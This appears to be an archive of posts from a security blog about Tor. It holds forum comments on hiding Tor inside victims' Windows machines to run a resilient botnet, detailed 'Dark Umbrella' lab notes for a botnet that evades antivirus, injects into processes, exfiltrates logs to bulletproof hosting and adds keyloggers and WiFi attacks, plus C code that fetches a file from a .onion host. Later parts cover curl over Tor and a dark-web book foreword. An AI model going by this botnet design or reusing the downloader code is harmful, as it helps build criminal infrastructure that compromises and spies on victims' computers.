  • Assuming the network was only to comprise of Windows machines you could use the Tor Expert Package. If Tor could be installed from the command line and have it hide from the system as much as possible, such as not creating Start Menu entries and Desktop icons, then this could have some potential without really much work at all. Does anyone know if this is possible, can Tor be installed from the command line with flags that set the options that would need disabling and without popping up an install wizard? If this is possible then Tor wouldn’t even need modifying at all.
  • As far as I can see, assuming Tor is not compromised and you are careful about how you do it, this seems like the best way to run a resilient botnet. If the C&C server code is secure and you keep the attack surface to a minimum this sort of network would resist a lot of scrutiny before it could effectively be mitigated.

gAtOmAlO LaB nOtEs

Working on a similar project. Dark Umbrella fast flux/domain flux hybrid approach

(In development about 3-5 months left)

bot coded in assembly no dependencies

Each build has maximum of 10k bots to ovoid widespread av detection.

Basic bot uses socks5.

built in ssh client

(fast-flux)

Bot is built with 30k pre generated 256 bit AES keys.

1 256 bit AES key for logs

1 256 bit AES key ssh

1 256 bit AES key socks 5

hwid it selects a pre-generated key 256 bit AES key.

Bot writes encrypted data into common file using stenography

process injection

Download/Upload Socks5

Bot sends data to a collector bot via socks5 through ipv6 which makes NAT traversal a trivial matter.

Using ipv6 in ipv4 tunnel.

Collector bot assembly

tor and i2p Plug-ins C++

Assuming 10k bots

Bots will be assigned into small groups of 25. And are assigned 400 collectors bots which is evenly 200 tor and 200 i2p.

Collector packages the encrypted logs and imports them into a .zip or rar archive and uses sftp to upload through tor to a bullet proof server Note the Ukraine is best know

Russia is no good.

(Domain-flux .onion panel can be easily moved)

Using a Ubuntu Server on bullet proof server.

Using tor and Privoxy. Panel can be routed through multiple cracked computers using proxychains and ssh.

Server uses a simple .onion panel with php5 and apache2 and mysql.

You might ask what happens if bullet proof server is down. The collector bots can be loaded with 5 .onion panels. If panel fails for 24 hours its removed from all Collectors and bot will go to the next one and so forth.

A python Daemon runs and unzip the data and Imports it into a mysql database were it remains encrypted.

The bot master uses my Dark Umbrella.net panel to connect to the remote Bullet Proof server through a vpn and then through tor using ssh to run remote commands on server and

sftp to upload and download. Running tor through a log less vpn through with a trusted exit node on the tor network. .net panel connects to mysql database database is decrypted

on .NET panel (Note must real Bullet Proof hosting is not trust worthy this solves that issue) and imported into a local .mdb database. Then later the bot Master should encrypt

database folder on true crypt. Commands are sent to bots individually rather then corporately like most bot nets. This allows for greater anonymity It will be possible to send

commands corporately but strongly discouraged. Collector bots download and upload large files through i2p.

1.Connects remotely to rpc daemon through backconect and simplifying metasploit (Working)

2.Social network cracker. (in development)

3.Statics. (Working)

4.Anonymity status. (Working)

5.Decrypt-er. Decryption codes in highly obfuscated.net limiting each build to 10k bots. (Working)

6.Daemon status (Working)

7.logs (Working)

8.Metasploit connects via rpc. (working)

9. GPS tracked Assets by Google maps and using net-book with a high powered external usb wifi attenas.

Starts an automatic attack if wep if wpa2 grabes handshake. If open starts basic arp spoofing attack. Common browser exploits. (in development)

10.Teensy spread. (in development)

11.vnc back connect. (working)

12. Advanced Persistent threat. Fake Firefox, Fake Internet Explorer, Fake Chrome. Fake Windows Security Essentials. (in development allows for excellent custom Bot-master defined keyloging)

13. Dark search bot index file is downloaded allowing easy searching of hard drives. (Working)

14. voip logic bomb. bot computer is sent via a voip call file once played through voip the microphone hears mp3 file and the dormant payload is activated in bot that is the logic bomb. (in development)

bot Plug-ins developed later

Each Panel is hwid

1 unique build per Copy embedded into panel.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

function tor_new_identity($tor_ip='127.0.0.1', $control_port='9051', $auth_code=''){
$fp = fsockopen($tor_ip, $control_port, $errno, $errstr, 30);
if (!$fp) return false; //can't connect to the control port

fputs($fp, “AUTHENTICATE $auth_code\r\n”);
$response = fread($fp, 1024);
list($code, $text) = explode(‘ ‘, $response, 2);
if ($code != ‘250’) return false; //authentication failed

//send the request to for new identity
fputs($fp, “signal NEWNYM\r\n”);
$response = fread($fp, 1024);
list($code, $text) = explode(‘ ‘, $response, 2);
if ($code != ‘250’) return false; //signal failed

fclose($fp);
return true;
}

/**
* Load the TOR’s “magic cookie” from a file and encode it in hexadecimal.
**/
function tor_get_cookie($filename){
$cookie = file_get_contents($filename);
//convert the cookie to hexadecimal
$hex = ”;
for ($i=0;$i<strlen($cookie);$i++){
$h = dechex(ord($cookie[$i]));
$hex .= str_pad($h, 2, ‘0’, STR_PAD_LEFT);
}
return strtoupper($hex);
}

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

#define CURL_STATICLIB
#include <stdio.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <curl/types.h>
#include <curl/easy.h>
#include <string>
#include <ctime>

size_t write_data(void *ptr, size_t size, size_t nmemb, FILE *stream) {
size_t written;
written = fwrite(ptr, size, nmemb, stream);
return written;
}

void startTor() {
system(“C:\\tor.exe”);
Sleep(5000);
return;
}

int main(void) {

//    startTor();

CURL *curl;
FILE *fp;
CURLcode res;
char *url = “http://46lm7zhgildryehk.onion/files/msg.sig”;
char outfilename[FILENAME_MAX] = “C:\\msg.sig”;
curl_global_init(CURL_GLOBAL_DEFAULT);
curl = curl_easy_init();
if (curl) {
fp = fopen(outfilename,”wb”);
curl_easy_setopt(curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS4A);
curl_easy_setopt(curl, CURLOPT_PROXY, “127.0.0.1:9050″);
curl_easy_setopt(curl, CURLOPT_URL, url);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_data);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, fp);
res = curl_easy_perform(curl);
curl_easy_cleanup(curl);
fclose(fp);

}
return 0;
}

 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Now first gAtO will give you the counter-measures you see if they run Tor then a simple “netstat -ar |grep LISTEN” at any unix terminal will show you what is open and who and what is LISTENing on what ports:../

Now when I only only using Tor to browse: I run —>  :MacOS gatomalo$ netstat -av |grep LISTEN 

Tor Browser – tcp4       0      0  *.9030                 *.*                    LISTEN

after I run Tor manually to use system commands I can see my ticket out of the :MacOS gatomalo$ netstat -av |grep LISTEN

Tor tcp4       0      0  localhost.9050    *.*    LISTEN

Tor Bundle tcp4       0      0  *.9030                 *.*    LISTEN

So turn off 9050 port in your firewall.

07/12/12

OSx -Tor Web Crawler Project

OSx Curl .onion sites -how 2 guide- Tor Web Crawler Project

gATO hAs - been looking into mapping the Tor -.onion network crawling it from aA to zZ , from 1-7 all 16 digits. I use OSx for most of my work and I wanted to curl an .onion site and check it out. As I dug around I found that if I just check my Vidalia.app it will show me were everything is located. Then the fun begins

find your /TorBrowser_en-US-6.app then click and look at the file Info  then go to: TorBrowser_en-US-6.app/Contents/MacOS/

cd - TorBrowser_en-US-6.app/Contents/MacOS/

once here :

- this will show you the files

ls -fGo 

total 5976

drwxr-xr-x  7 richardamores      238 Jun  8 07:11 .

drwxr-xr-x  7 richardamores      238 Feb 19 06:54 ..

drwxr-xr-x  3 richardamores      102 Feb 19 06:54 Firefox.app

-rwxr-xr-x  1 richardamores  3045488 Feb 19 06:54 tor

-rwxr-xr-x  1 richardamores     1362 Feb 19 06:54 TorBrowserBundle

drwxr-xr-x  4 richardamores      136 Feb 19 06:54 Vidalia.app

-rw-r–r–  1 richardamores     6435 Jun  8 07:11 VidaliaLog-06.08.2012.txt

Now I fire up the tor application ./tor

Next open up another Terminal box and check to see if Tor port is open and LISTENing on port 9050

netstat -ant | grep 9050 # verify Tor is running

Once you can see port 9050 LISTEN then your ready to use curl—

curl -ivr –socks4a 127.0.0.1:9050 http://utup22qsb6ebeejs.onion/

curl -ivr –socks4a 127.0.0.1:9050 http://nwycvryrozllb42g.onion  

curl -ivr –socks4a 127.0.0.1:9050  http://2qd7fja6e772o7yc.onion/

curl -ivr –socks4a 127.0.0.1:9050 http://5onwnspjvuk7cwvk.onion/

curl -ivr –socks4a 127.0.0.1:9050 http://6sgjmi53igmg7fm7.onion/

curl -ivr –socks4a 127.0.0.1:9050 http://6vmgggba6rksjyim.onion/

Here are a few site that you can check out:../ curl is just one of those tools that keeps on giving and of course if I can get one APP to work thru Tor on OSx, then I can get other apps to use Tor as a proxy for all my line command –time to have some fun- gATO oUt

Lab -Notes

  1. sudo apt-get install tor
  2. sudo /etc/init.d/tor start
  3. netstat -ant | grep 9050 # verify Tor is running

here is a good crawler  to play with

<?php

$ch = curl_init(‘http://google.com’);

curl_setopt($ch, CURLOPT_HEADER, 1);

curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, 1);

curl_setopt($ch, CURLOPT_PROXY, ‘https://127.0.01:9050/’);

curl_exec($ch);

curl_close($ch);

<?php

$ch = curl_init(‘http://google.com’);

curl_setopt($ch, CURLOPT_HEADER, 1);

curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, 1);

// Socks5

curl_setopt($ch, CURLOPT_PROXY, “localhost:9050″);

curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);

curl_exec($ch);

curl_close($ch);

Tor Web Crawler

http://stackoverflow.com/questions/9237477/tor-web-crawler

did not work – netstat shows it on socks4 not socks5

curl -s –socks5-local 127.0.0.1:9050 –user-agent “Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US;rv:1.9.2.3) \ Gecko/20100401 Firefox/3.6.3″ -I http://utup22qsb6ebeejs.onion/

turn on ToR

Run  /Users/gatomalo/Downloads/TorBrowser_en-US-6.app/Contents/MacOS/tor

cd /Users/gatomalo/Downloads/TorBrowser_en-US-6.app/Contents/MacOS

./tor

now check for 9050 running proxy

netstat -ant | grep 9050

Now run your network commands thru socks port 9050

./Users/gatomalo/Downloads/TorBrowser_en-US-6.app/Contents/MacOS/tor

ls -fGo

total 5976

drwxr-xr-x  7 richardamores      238 Jun  8 07:11 .

drwxr-xr-x  7 richardamores      238 Feb 19 06:54 ..

drwxr-xr-x  3 richardamores      102 Feb 19 06:54 Firefox.app

-rwxr-xr-x  1 richardamores  3045488 Feb 19 06:54 tor

-rwxr-xr-x  1 richardamores     1362 Feb 19 06:54 TorBrowserBundle

drwxr-xr-x  4 richardamores      136 Feb 19 06:54 Vidalia.app

-rw-r–r–  1 richardamores     6435 Jun  8 07:11 VidaliaLog-06.08.2012.txt

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

curl -S –socks5-hostname 127.0.0.1:9050 -I http://utup22qsb6ebeejs.onion/

HTTP/1.1 200 OK

Date: Thu, 12 Jul 2012 17:49:49 GMT

Server: Apache/2.2.22 (Ubuntu)

X-Powered-By: PHP/5.3.10-1ubuntu3.2

Set-Cookie: fpsess_fp-a350e65d=8hg0upuuhcpuf4pgvg45l9c2b2; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Transfer-Encoding: chunked

Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Strict//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd”>

<html xmlns=”http://www.w3.org/1999/xhtml”>

<head>

<title>My Hidden Blog</title>

<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />

<!– start of jsUtils –>

<script type=”text/javascript” src=”http://utup22qsb6ebeejs.onion/fp-plugins/jquery/res/jquery-1.4.2.min.js”></script>

<script type=”text/javascript” src=”http://utup22qsb6ebeejs.onion/fp-plugins/jquery/res/jquery-ui-1.8.2.custom.min.js”></script>

<!– end of jsUtils –>

<!– FP STD HEADER –>

<meta name=”generator” content=”FlatPress fp-0.1010.1″ />

<link rel=”alternate” type=”application/rss+xml” title=”Get RSS 2.0 Feed” href=”http://utup22qsb6ebeejs.onion/?x=feed:rss2″ />

<link rel=”alternate” type=”application/atom+xml” title=”Get Atom 1.0 Feed” href=”http://utup22qsb6ebeejs.onion/?x=feed:atom” />

<!– EOF FP STD HEADER –>

<!– FP STD STYLESHEET –>

<link media=”screen,projection,handheld” href=”http://utup22qsb6ebeejs.onion/fp-interface/themes/leggero/leggero/res/style.css” type=”text/css” rel=”stylesheet” /><link media=”print” href=”http://utup22qsb6ebeejs.onion/fp-interface/themes/leggero/leggero/res/print.css” type=”text/css” rel=”stylesheet” />

<!– FP STD STYLESHEET –>

Some other curl switches =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

–connect-timeout <seconds>

Maximum time in seconds that you allow the connection to the server to take.  This only limits the con-

nection  phase,  once  curl  has  connected  this  option is of no more use. See also the -m/–max-time

option.

 

If this option is used several times, the last one will be used.

 

-D/–dump-header <file>

Write the protocol headers to the specified file.

 

This  option  is handy to use when you want to store the headers that a HTTP site sends to you. Cookies

from the headers could then be read in a second curl invocation by using the  -b/–cookie  option!  The

-c/–cookie-jar option is however a better way to store cookies.

 

When  used  in  FTP,  the  FTP  server response lines are considered being “headers” and thus are saved

there.

 

If this option is used several times, the last one will be used.

 

 

-f/–fail

(HTTP)  Fail silently (no output at all) on server errors. This is mostly done to better enable scripts

etc to better deal with failed attempts. In normal cases when a HTTP server fails to  deliver  a  docu-

ment,  it returns an HTML document stating so (which often also describes why and more). This flag will

prevent curl from outputting that and return error 22.

 

This method is not fail-safe and there are occasions where  non-successful  response  codes  will  slip

through, especially when authentication is involved (response codes 401 and 407).

 

 

 

–ssl

(FTP,  POP3,  IMAP, SMTP) Try to use SSL/TLS for the connection.  Reverts to a non-secure connection if

the server doesn’t support SSL/TLS.  See also –ftp-ssl-control and –ssl-reqd for different levels  of

encryption required. (Added in 7.20.0)

 

This  option  was  formerly known as –ftp-ssl (Added in 7.11.0) and that can still be used but will be

removed in a future version.

 

-H/–header <header>

(HTTP)  Extra  header to use when getting a web page. You may specify any number of extra headers. Note

that if you should add a custom header that has the same name as one of the internal  ones  curl  would

use,  your externally set header will be used instead of the internal one. This allows you to make even

trickier stuff than curl would normally do. You should not replace internally set headers without know-

ing perfectly well what you’re doing. Remove an internal header by giving a replacement without content

on the right side of the colon, as in: -H “Host:”.

 

curl will make sure that each header you add/replace is sent with the proper  end-of-line  marker,  you

should thus not add that as a part of the header content: do not add newlines or carriage returns, they

will only mess things up for you.

 

See also the -A/–user-agent and -e/–referer options.

 

This option can be used multiple times to add/replace/remove multiple headers.

 

-o/–output <file>

Write output to <file> instead of stdout. If you are using {} or [] to fetch  multiple  documents,  you

can  use ‘#’ followed by a number in the <file> specifier. That variable will be replaced with the cur-

rent string for the URL being fetched. Like in:

 

curl http://{one,two}.site.com -o “file_#1.txt”

 

or use several variables like:

 

curl http://{site,host}.host[1-5].com -o “#1_#2″

 

You may use this option as many times as the number of URLs you have.

 

See also the –create-dirs option to create the local directories dynamically. Specifying the output as

‘-‘ (a single dash) will force the output to be done to stdout.

 

-r/–range <range>

(HTTP/FTP/SFTP/FILE) Retrieve a byte range (i.e a partial document) from a HTTP/1.1, FTP or SFTP server

or a local FILE. Ranges can be specified in a number of ways.

 

0-499     specifies the first 500 bytes

 

500-999   specifies the second 500 bytes

 

-500      specifies the last 500 bytes

9500-     specifies the bytes from offset 9500 and forward

 

0-0,-1    specifies the first and last byte only(*)(H)

 

500-700,600-799

specifies 300 bytes from offset 500(H)

 

100-199,500-599

specifies two separate 100-byte ranges(*)(H)

 

 

 -v/–verbose

Makes  the fetching more verbose/talkative. Mostly useful for debugging. A line starting with ‘>’ means

“header data” sent by curl, ‘<‘ means “header data” received by curl that is hidden  in  normal  cases,

and a line starting with ‘*’ means additional info provided by curl.

 

Note  that if you only want HTTP headers in the output, -i/–include might be the option you’re looking

for.

 

If you think this option still doesn’t give you enough details, consider using –trace or –trace-ascii

instead.

 

This option overrides previous uses of –trace-ascii or –trace.

 

Use -s/–silent to make curl quiet.

07/5/12

The Deep Dark Web -Book

gAtO sAy -mEoW you all- we have a new book coming out soon “The Deep Dark Web” and just wanted to write this as the foreword for the book, I thought it was interesting …//looking for peer review of book…write us

This book is to inform you about “The Deep Dark Web”. We hear that it’s a bad place full of crooks and hackers, but it is more a place were you have total anonymity as an online-user and yes there are ugly places in the dark web but it’s a small part of it. What it really is all about it’s freedom of expression, freedom of speech worldwide, supported by “us/we” the users of the network. It’s not controlled by any government, but blocked by a few like Syria, Iran, Ethiopia, China to name a few governments that want to deny their own people free access to information, to speak freely about their grievances and unite to tear down there walls of oppression.

Pierluigi and I (gAtO) share a passion for cyber security we write different blogs Pierluigi has http://securityaffairs.co/wordpress/ and my site is uscyberlabs.com . We also write at other blogs and print media. We did’nt know it at the time but, we were writing cyber history as the 2011- 2012 cyber explosion took off we were at ground zero writing about Stuxnet, HBGrays, the LulzPirates, Anonymous but the Arab Spring was an awaking :

The recent revolution in Egypt that ended the autocratic presidency of Hosni Mubarak was a modern example of successful nonviolent resistance. Social Media technologies provided a useful tool for the young activist to orchestrate this revolution. However the repressive Mubarak regime prosecuted many activists and censored a number of websites. This made their activities precarious, making it necessary for activists to hide their identity on the Internet. The anonymity software Tor was a tool used by some bloggers, journalists and online activists to protect their identity and to practice free speech.

Today we have lot’s of anonymity communication tools I2P, Freenet, Gnunet and Tor to name a few. Why did the TorProject.org Tor-.onion network become the facto application to get free, private, anonymized Internet access. My conclusion is it’s humble beginnings with “Naval Research Project & DARPA (Defense Advanced Research Project Agency) ” sponsored, maybe you heard of DARPA they kinda created the Internet a long time ago. The government wanted to have a communication secure media that would piggy-bak on the establish Internet. From my point of view when they saw how good this worked the government used it to allow it’s agents to quietly use the network for CIA covert operations (just to name a few alphabet soup government agencies that use it). For example a branch of the U.S. Navy uses Tor for open source intelligence gathering, and one of its teams used Tor while deployed in the Middle East recently. Law enforcement uses Tor for visiting or surveilling web sites without leaving government IP addresses in their web logs, and for security during sting operations.

Journalist got a hold of this tool and they too were able to file reports before governments agents censored their interviews and film footage. The EFF (Electronic Frontier Foundation) got a hold of the Tor-networks and promoted it to maintaining civil liberties online. When the common business executive visited a foreign country (like China know to monitor foreigners Internet access) they now had a way to securely connect to their corporate HQ data-center without being monitored and giving away IP (Intellectual Properties). The Tor-Network became to good and the bad guy’s moved in to keep their illegal business safer from the law. The Internet Cyber-criminal has used the claer-web since the start so of course they went over to the Tor-.onion network because it works if you use it right and keeps you anonymous online.

With all this happening and the “Year of the Hack 2011” you can see why security geeks like Pierluigi and I became intrigued with this subject and we teamed up to write this manuscript hoping to answer some of the questions our friends, and peers were asking us about this mysterious hidden world call the deep dark web. We outlined a table of content and started to write about it in our blogs and the story unfolds from here to you. We hope to educate you on how this network works without too much geek talk (ok just a little). We cover the cyber criminals and their ecosystem we cover the financial currency (bitCoins) that is replacing fiat currencies all over the world during this unstable financial times. We tried to cover all the good , the bad and the ugly of the .onion network. We hope it will answer some of your questions but I am sure that more question will come up so feel free to come to our websites and give us a shout and ask your questions about the deep dark web…. - gAtO oUT